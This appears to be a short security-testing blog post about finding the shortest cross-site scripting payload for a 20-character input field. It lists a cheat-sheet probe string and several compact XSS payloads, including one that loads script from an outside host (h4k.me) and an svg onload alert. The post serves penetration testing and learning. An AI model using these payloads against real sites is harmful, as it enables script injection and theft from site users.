Popping up an XSS alert via a field which does not accept more than 20 characters

While testing an app, a text field was not accepting more than 20 characters (server side validation). I inserted following piece of code to check XSS (From RSnake’s XSS cheat sheet):

'';!--"<XSS>=&{()}

and verified the HTML source for the encoded characters . As < was in the HTML source,  the input field was seem to be missing output encoding and hence was vulnerable to cross site scripting.

Now, I just needed a popup to conclude this theory. I started looking for a smaller script. I tried to create/find some payloads which were less than 20 characters but I was unable to find anything. At that point of time, a random question came to my mind that, what is the smallest possible payload to pop up an alert. I know it was not needed to prove the XSS or missing output encoding but just a random question.
Here are some possible payloads compiled from my own answer and a few others:

<a href=http://a.by>
<a onclick=alert(2)>
<b onclick=alert(2)>
<script src=//h4k.me

Update (7th March, 2019)- This is very old post and may be obsolete now. I guess as someone replied to that question in 2017, following may be the smallest payload to pop up an alert now. I need to check.

<svg/onload=alert()>

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s